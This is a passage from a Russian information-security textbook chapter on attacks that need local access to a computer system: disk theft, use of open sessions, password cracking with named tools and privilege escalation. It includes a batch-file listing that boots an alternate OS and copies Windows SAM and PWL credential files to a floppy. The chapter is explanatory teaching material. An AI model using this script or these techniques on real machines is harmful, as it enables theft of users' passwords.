ВУЗ: Не указан
Категория: Не указан
Дисциплина: Не указана
Добавлен: 10.06.2021
Просмотров: 3618
Скачиваний: 3
Локальный
доступ
221
речни
учетных
записей
,
схемы
распределения
сетевых
адресов
и
т
.
п
.)
и
собственно
при
-
кладной
информации
.
Многих
злоумышленников
,
проникающих
в
АС
,
подключенные
к
глобальным
сетям
,
вообще
не
интересует
хранящаяся
в
этих
АС
прикладная
информация
или
интересует
лишь
в
той
степени
,
в
какой
она
позволяет
получить
доступ
к
системной
информации
.
Обычно
такие
злоумышленники
используют
подобные
АС
либо
в
качестве
промежуточных
узлов
для
проникновения
в
другие
АС
,
либо
для
несанкционированного
хранения
собственной
информации
.
По
тяжести
последствий
используемые
злоумышленниками
методы
и
средства
несанкционированного
получения
информации
можно
разделить
на
неопасные
(
скани
-
рование
портов
,
попытки
установления
соединений
и
т
.
п
.),
потенциально
опасные
(
по
-
лучение
доступа
к
содержимому
подсистем
хранения
данных
,
попытки
подбора
паролей
и
т
.
п
.),
опасные
(
получение
доступа
с
высоким
уровнем
полномочий
,
модификация
ин
-
формации
в
АС
,
копирование
системной
и
прикладной
информации
,
создание
собствен
-
ной
информации
и
т
.
п
.)
и
чрезвычайно
опасные
(
уничтожение
информации
,
блокирова
-
ние
доступа
легальных
пользователей
к
АС
и
т
.
п
.).
Локальный
доступ
Как
уже
отмечалось
,
при
наличии
у
злоумышленника
локального
доступа
к
АС
и
благоприятной
для
него
обстановки
он
сможет
обойти
практически
любую
защиту
.
Для
того
чтобы
значительно
снизить
шансы
злоумышленника
,
имеющего
локальный
доступ
к
интересующей
его
АС
,
необходимо
предпринять
целый
комплекс
мер
,
как
техническо
-
го
,
так
и
организационного
характера
,
начиная
от
проектирования
архитектуры
АС
с
учетом
всех
требований
защиты
и
заканчивая
установкой
камер
наблюдения
,
охранной
сигнализации
и
организации
специального
режима
доступа
.
Однако
на
практике
в
боль
-
шинстве
случаев
,
по
крайней
мере
какой
-
либо
один
фактор
остается
вне
поля
зрения
ор
-
ганизаций
,
обрабатывающих
в
своих
АС
информацию
с
ограниченным
доступом
,
кото
-
рая
может
интересовать
тех
или
иных
злоумышленников
.
Нередко
оказывается
и
так
,
что
таких
факторов
значительно
больше
,
поэтому
если
организация
не
приняла
всех
мер
для
того
,
чтобы
предотвратить
несанкционированный
локальный
доступ
к
своим
АС
и
их
компонентам
,
можно
сказать
с
уверенностью
,
что
ее
секреты
рано
или
поздно
попа
-
дут
к
заинтересованным
лицам
.
Рассмотрим
подробнее
методы
и
средства
несанкционированного
доступа
к
инфор
-
мации
,
которые
можно
применить
на
локальном
уровне
.
Прежде
всего
,
злоумышленник
может
воспользоваться
одним
из
самых
древних
спо
-
собов
,
против
которого
не
сможет
противостоять
никакая
АС
, —
хищением
.
Хищение
информации
,
ее
носителей
,
отдельных
компонентов
АС
и
,
учитывая
современные
тен
-
денции
к
миниатюризации
СВТ
,
целых
АС
было
и
остается
одним
из
самых
распростра
-
ненных
способов
несанкционированного
получения
информации
.
При
этом
квалифика
-
ция
лиц
,
участвующих
в
хищении
может
быть
самой
низкой
,
а
правоохранительные
ор
-
ганы
,
расследующие
такие
факты
,
да
и
зачастую
сами
подвергшиеся
хищению
организации
,
как
правило
,
сосредотачивают
основное
внимание
на
осязаемых
матери
-
222
Глава
13.
Методы
и
средства
несанкционированного
получения
...
альных
ценностях
.
К
хищению
можно
отнести
и
такие
действия
злоумышленников
,
ко
-
гда
компоненты
АС
просто
подменяются
на
аналогичные
.
Например
,
сначала
специа
-
лист
высокой
квалификации
оказавшись
под
каким
-
то
предлогом
в
офисе
организации
и
используя
благоприятную
ситуацию
,
может
за
считанные
секунды
выяснить
модель
же
-
сткого
диска
,
причем
все
его
действия
будет
контролировать
легальный
пользователь
(
типичная
ситуация
—
любезное
предложение
помощи
неопытному
сотруднику
,
у
кото
-
рого
“
завис
”
компьютер
и
т
.
п
.).
Затем
злоумышленникам
остается
лишь
найти
вышед
-
ший
из
строя
жесткий
диск
аналогичной
модели
и
,
тайно
проникнув
в
офис
,
заменить
интересующий
их
жесткий
диск
неисправным
.
Если
в
организации
не
ведется
строгого
учета
компонентов
АС
по
серийным
номерам
(
что
,
к
сожалению
,
встречается
сплошь
и
рядом
),
а
злоумышленникам
удастся
скрыть
факт
проникновения
в
помещение
(
что
так
-
же
не
очень
большая
проблема
для
опытных
взломщиков
),
то
такое
происшествие
не
вы
-
зовет
никакого
подозрения
.
Кроме
того
,
к
хищениям
во
многих
случаях
можно
отнести
прямое
копирование
все
-
го
жесткого
диска
на
другой
диск
.
Даже
если
исходный
диск
защищен
,
например
,
с
по
-
мощью
шифрования
,
злоумышленник
средней
квалификации
может
принести
с
собой
другой
жесткий
диск
большего
объема
и
просто
скопировать
все
содержимое
исходного
диска
на
свой
диск
,
который
впоследствии
будет
передан
на
исследование
специалистам
более
высокой
квалификации
.
В
таком
случае
получение
несанкционированного
доступа
к
скопированной
информации
—
всего
лишь
вопрос
времени
.
Наконец
,
следует
знать
,
что
часто
хищение
информации
маскируется
под
хищение
материальных
ценностей
.
Например
,
злоумышленники
могут
похитить
все
офисное
обо
-
рудование
,
хотя
на
самом
деле
их
интересует
лишь
содержимое
жесткого
диска
компью
-
тера
,
стоявшего
в
кабинете
руководителя
.
Часто
оказывается
,
что
руководители
органи
-
заций
,
требуя
от
подчиненных
соблюдения
всех
правил
информационной
безопасности
,
не
распространяют
на
себя
эти
требования
,
хотя
имеют
доступ
к
любым
файлам
своих
подчиненных
.
Например
,
большинство
руководителей
даже
не
подозревают
,
что
все
от
-
крываемые
ими
по
сети
файлы
таких
программ
,
как
Microsoft Word
и
других
офисных
приложений
,
копируются
в
папку
для
временных
файлов
Windows
на
локальном
диске
.
Вторым
распространенным
методом
несанкционированного
получения
информации
при
локальном
доступе
к
АС
является
использование
открытого
сеанса
легального
пользователя
.
Здесь
возможности
злоумышленника
определяются
лишь
временем
,
на
который
он
получает
доступ
к
АС
,
полномочиями
в
АС
легального
пользователя
и
нали
-
чием
(
точнее
,
отсутствием
)
контроля
со
стороны
легального
пользователя
или
его
кол
-
лег
.
Особая
опасность
этого
метода
заключается
в
том
,
что
со
стороны
специалистов
по
защите
информации
действия
злоумышленника
,
воспользовавшегося
открытым
сеансом
легального
пользователя
,
скорее
всего
,
не
вызовут
никаких
подозрений
(
в
большинстве
случаев
на
“
своих
”
пользователей
,
особенно
если
они
занимают
в
иерархии
организации
более
высокое
положение
,
администраторы
безопасности
обращают
меньше
всего
вни
-
мания
).
Часто
пользователи
практически
подталкивают
посторонних
к
несанкциониро
-
ванному
доступу
к
своим
системам
,
размещая
свои
пароли
“
под
рукой
”
прямо
на
рабо
-
чем
месте
(
например
,
наклеивая
листки
для
записей
с
паролями
на
монитор
или
на
Локальный
доступ
223
тыльную
сторону
клавиатуры
).
В
этом
случае
такая
“
защищенная
”
система
ничем
не
от
-
личается
от
системы
,
на
которой
остался
открытым
сеанс
легального
пользователя
.
Близким
к
указанному
выше
методу
является
подбор
пароля
легального
пользова
-
теля
.
Этот
метод
более
“
заметен
”
со
стороны
компонентов
АС
,
обеспечивающих
безо
-
пасность
,
однако
также
оказывается
достаточно
эффективным
.
Например
,
в
организации
может
быть
реализована
жесткая
политика
по
выбору
паролей
,
обеспечивающая
невоз
-
можность
случайного
подбора
или
угадывания
паролей
за
2–3
попытки
с
блокированием
учетной
записи
при
превышении
количества
попыток
.
При
этом
все
пользователи
орга
-
низации
,
покидая
рабочее
место
,
должны
временно
блокировать
доступ
к
своим
систе
-
мам
так
,
чтобы
блокировка
снималась
только
при
правильно
введенном
пароле
.
Однако
некоторые
пользователи
могут
установить
полюбившиеся
программы
-
заставки
,
в
кото
-
рых
ввод
пароля
происходит
в
обход
основной
операционной
системы
.
Часто
оказывает
-
ся
,
что
такие
пользователя
в
качестве
пароля
выбирают
последовательности
вида
1111
или
user
и
т
.
п
.,
что
значительно
облегчает
задачу
подбора
пароля
легального
пользова
-
теля
.
Часто
для
осуществления
подбора
пароля
легального
пользователя
злоумышленники
прибегают
к
использованию
открытого
сеанса
этого
же
или
другого
пользователя
с
по
-
следующим
копированием
системных
файлов
.
В
частности
,
в
системах
Windows 98/ME
злоумышленник
может
скопировать
файлы
с
расширением
PWL
,
находящиеся
в
основ
-
ной
папке
Windows,
а
затем
применить
к
ним
какое
-
нибудь
средство
вскрытия
файлов
PWL
,
например
Repwl
или
CAIN.
В
системах
Windows NT/2000/XP
с
той
же
целью
зло
-
умышленник
может
скопировать
файл
SAM
или
его
резервную
копию
SAM._
,
находя
-
щиеся
в
папке
repair
системной
папки
Windows,
а
затем
попытаться
установить
хра
-
нящиеся
в
них
пароли
с
помощью
системы
L0phtCrack.
В
Unix-
подобных
системах
наи
-
больший
интерес
для
злоумышленника
представляют
файлы
/etc/passwd
или
shadow
.
С
помощью
таких
утилит
,
как
crack
или
john
,
любой
злоумышленник
,
обла
-
дая
минимальной
квалификацией
,
может
за
считанные
минуты
или
даже
секунды
полу
-
чить
информацию
о
паролях
легальных
пользователей
,
хранящихся
в
этих
файлах
.
Еще
одним
методом
локального
несанкционированного
доступа
является
использо
-
вание
учетной
записи
легального
пользователя
для
расширения
полномочий
в
АС
.
Он
отличается
от
метода
использования
открытого
сеанса
легального
пользователя
тем
,
что
в
данном
случае
злоумышленнику
не
требуется
выдавать
себя
за
другого
,
поскольку
он
в
силу
тех
или
иных
причин
сам
имеет
доступ
к
АС
.
Например
,
во
многих
организа
-
циях
сторонним
пользователям
,
посетителям
,
представителям
других
организаций
,
вре
-
менным
сотрудникам
и
другим
лицам
,
не
являющимся
сотрудниками
организации
,
пре
-
доставляют
так
называемые
гостевые
учетные
записи
.
Однако
часто
оказывается
,
что
АС
,
предназначенные
для
гостевого
доступа
,
имеют
физический
доступ
ко
всем
АС
ор
-
ганизации
,
а
действия
сторонних
пользователей
,
получающих
гостевой
доступ
,
практи
-
чески
никак
не
контролируются
.
Это
позволяет
злоумышленнику
,
воспользовавшись
специальными
программами
взлома
(exploit),
расширить
свои
полномочия
вплоть
до
по
-
лучения
полного
доступа
ко
всем
АС
организации
.
В
системах
Windows NT/2000/XP,
например
,
злоумышленник
может
воспользоваться
такими
программами
взлома
,
как
224
Глава
13.
Методы
и
средства
несанкционированного
получения
...
getadmin
или
main
,
а
в
Unix-
подобных
системах
—
многочисленными
программами
взлома
командной
оболочки
и
других
Unix-
программ
,
в
изобилии
присутствующих
в
Internet,
действие
которых
основано
на
известных
изъянах
соответствующего
системно
-
го
программного
обеспечения
Unix.
Наконец
,
часто
злоумышленнику
,
имеющему
локальный
доступ
к
АС
,
не
нужно
во
-
обще
обладать
квалификацией
даже
среднего
уровня
,
чтобы
получить
несанкциониро
-
ванный
доступ
к
информации
этой
АС
.
Во
многих
случаях
ему
достаточно
прибегнуть
к
такому
простому
приему
,
как
загрузка
альтернативной
операционной
системы
.
Такая
система
может
загружаться
как
с
дискеты
,
так
и
с
компакт
-
диска
. (
К
особой
разновидно
-
сти
этого
метода
является
срабатывание
функции
автозапуска
в
Windows 98.
Воспользо
-
вавшись
этим
изъяном
,
злоумышленник
может
запустить
нужную
ему
программу
даже
на
системе
c Windows 98,
защищенной
с
помощью
экранной
заставки
с
паролем
).
На
-
пример
,
с
помощью
простого
командного
файла
,
приведенного
в
листинге
13.1,
зло
-
умышленник
может
в
считанные
минуты
перезагрузить
компьютер
,
работающий
под
управлением
Windows 98/ME/2000/XP
и
получить
в
свое
распоряжение
перечень
всех
файлов
,
а
также
файлы
PWL
и
SAM
,
хранящиеся
на
дисках
этого
компьютера
.
Листинг
13.1.
Пример
командного
файла
для
загрузки
альтернативной
операционной
системы
@ECHO OFF
mode con codepage prepare=((866) ega3.cpi)
mode con codepage select=866
keyb ru,,keybrd3.sys
set EXPAND=YES
SET DIRCMD=/O:N
set LglDrv=27 * 26 Z 25 Y 24 X 23 W 22 V 21 U 20 T
set LglDrv=%LglDrv% 19 S 18 R 17 Q 16 P 15 O 14 N
set LglDrv=%LglDrv% 13 M 12 L 11 K 10 J 9 I 8 H 7 G
set LglDrv=%LglDrv% 6 F 5 E 4 D 3 C
call setramd.bat %LglDrv%
set temp=c:\
set tmp=c:\
path=%RAMD%:\;a:\;a:\vc
copy command.com %RAMD%:\ >nul
set comspec=%RAMD%:\command.com >nul
md %RAMD%:\vc >nul
%RAMD%:
copy a:\vc\*.* %RAMD%:\vc >nul
copy a:\arj.exe %RAMD%:\ >nul
copy a:\files.arj %RAMD%:\ >nul
copy a:\files.a01 %RAMD%:\ >nul
Удаленный
доступ
225
arj.exe e files.arj >nul
arj.exe e files.a01 -y >nul
A:\smartdrv.exe >nul
del files.a* >nul
md %RAMD%:\sec >nul
cd sec >nul
md disks >nul
cd disks >nul
ldir c: /s > c.txt
ldir d: /s > d.txt
Окончание
листинга
13.1
cd \
ntfspro.exe >nul
cd sec\disks
dir c: /s >> c.txt
dir d: /s >> d.txt
cd..
md c
md d
copy /b c:\winnt\system32\config\sam %RAMD%:\sec\c >nul
copy /b d:\winnt\system32\config\sam %RAMD%:\sec\d >nul
copy /b c:\windows\system32\config\sam %RAMD%:\sec\c >nul
copy /b d:\windows\system32\config\sam %RAMD%:\sec\d >nul
copy /b c:\windows\*.pwl %RAMD%:\sec\c >nul
copy /b d:\windows\*.pwl %RAMD%:\sec\d >nul
cd \
arj.exe a -r -v1200 dirs.arj %RAMD%:\sec -y >nul
copy %RAMD%:\dirs.arj a:\
copy %RAMD%:\dirs.a01 a:\
Удаленный
доступ
В
отличие
от
локального
доступа
,
палитра
методов
и
средств
несанкционированного
получения
информации
из
АС
при
удаленном
доступе
значительно
шире
и
достаточно
сильно
зависит
от
используемой
операционной
системы
(
ОС
),
настройки
параметров
безопасности
и
т
.
п
.
Как
ни
парадоксально
,
но
наиболее
защищенными
(
с
некоторыми
оговорками
)
при
удаленном
доступе
являются
АС
,
работающие
под
управлением
опера
-
ционных
систем
,
которые
наибольше
всего
уязвимы
при
локальном
доступе
,
например
Windows 98.
Однако
это
противоречие
только
кажущееся
.
Действительно
,
системы
типа